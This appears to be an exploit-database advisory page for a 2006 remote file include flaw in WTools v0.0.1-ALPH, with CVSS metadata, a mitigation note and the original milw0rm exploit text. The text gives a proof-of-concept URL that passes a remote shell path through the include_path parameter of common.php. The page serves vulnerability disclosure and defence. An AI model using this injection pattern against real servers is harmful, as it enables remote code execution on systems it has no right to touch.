header-logo
Suggest Exploit
vendor:
WTools
by:
ERNE
7,5
CVSS
HIGH
Remote File Include Vulnerability
98
CWE
Product Name: WTools
Affected Version From: v0.0.1-ALPH
Affected Version To: v0.0.1-ALPH
Patch Exists: NO
Related CWE: N/A
CPE: a:comscripts:wtools
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WTools v0.0.1-ALPH – Remote File Include Vulnerabilities

WTools v0.0.1-ALPH is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which will then include and execute the malicious file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  WTools v0.0.1-ALPH - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=1880
 
# Script  :  WTools v0.0.1-ALPH
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/common.php?include_path=[shell]

# milw0rm.com [2006-09-11]